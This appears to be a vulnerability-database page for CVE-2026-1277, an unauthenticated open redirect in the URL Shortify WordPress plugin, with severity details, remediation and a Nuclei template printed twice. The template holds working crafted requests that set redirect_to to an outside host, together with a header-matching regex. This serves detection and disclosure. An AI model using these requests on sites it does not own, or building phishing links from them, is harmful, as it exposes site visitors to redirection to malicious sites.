URL Shortify <= 1.12.1 - Open Redirect

CVE-2026-1277

Verified

Description

The URL Shortify plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.12.1 due to insufficient validation on the 'redirect_to' parameter in the promotional dismissal handler. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites via a crafted link.

Severity

Medium

CVSS Score

4.7

Exploit Probability

Published Date

March 16, 2026

Template Author

shivam kamboj

CVE-2026-1277.yaml

id: CVE-2026-1277

info:
  name: URL Shortify <= 1.12.1 - Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The URL Shortify plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.12.1 due to insufficient validation on the 'redirect_to' parameter in the promotional dismissal handler. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites via a crafted link.
  impact: |
    Unauthenticated attackers can redirect users to malicious sites, facilitating phishing or malware distribution.
  remediation: |
    Update to the latest version beyond 1.12.1.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/url-shortify/url-shortify-1121-unauthenticated-open-redirect-via-redirect-to-parameter
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1277
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
    cvss-score: 4.7
    cve-id: CVE-2026-1277
    epss-score: 0.00339
    epss-percentile: 0.56752
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/plugins/url-shortify/"
  tags: cve,cve2026,wordpress,wp,wp-plugin,redirect,url-shortify,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=bfcm_2025_offer&redirect_to=https://interact.sh"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=welcome_offer&redirect_to=https://interact.sh"

    stop-at-first-match: true

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 490a0046304402206b283875e1a9b260d5f3b9786310fc9ccba1e20fa8533ca5809ac8f3492fee7b0220072d6fa69c927f7b474ce9e093c0c1f7d8bfd27f896cd608c35adb47df1b2b29:922c64590222798bb761d5b6d8e72950

4.7Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

CVE ID:

cve-2026-1277

CWE ID:

cwe-601

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/url-shortify/url-shortify-1121-unauthenticated-open-redirect-via-redirect-to-parameter https://nvd.nist.gov/vuln/detail/CVE-2026-1277

Remediation Steps

Update to the latest version beyond 1.12.1.

Description

id: CVE-2026-1277

info:
  name: URL Shortify <= 1.12.1 - Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The URL Shortify plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.12.1 due to insufficient validation on the 'redirect_to' parameter in the promotional dismissal handler. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites via a crafted link.
  impact: |
    Unauthenticated attackers can redirect users to malicious sites, facilitating phishing or malware distribution.
  remediation: |
    Update to the latest version beyond 1.12.1.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/url-shortify/url-shortify-1121-unauthenticated-open-redirect-via-redirect-to-parameter
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1277
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
    cvss-score: 4.7
    cve-id: CVE-2026-1277
    epss-score: 0.00339
    epss-percentile: 0.56752
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/plugins/url-shortify/"
  tags: cve,cve2026,wordpress,wp,wp-plugin,redirect,url-shortify,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=bfcm_2025_offer&redirect_to=https://interact.sh"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=welcome_offer&redirect_to=https://interact.sh"

    stop-at-first-match: true

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 490a0046304402206b283875e1a9b260d5f3b9786310fc9ccba1e20fa8533ca5809ac8f3492fee7b0220072d6fa69c927f7b474ce9e093c0c1f7d8bfd27f896cd608c35adb47df1b2b29:922c64590222798bb761d5b6d8e72950

URL Shortify <= 1.12.1 - Open Redirect

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

URL Shortify <= 1.12.1 - Open Redirect

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps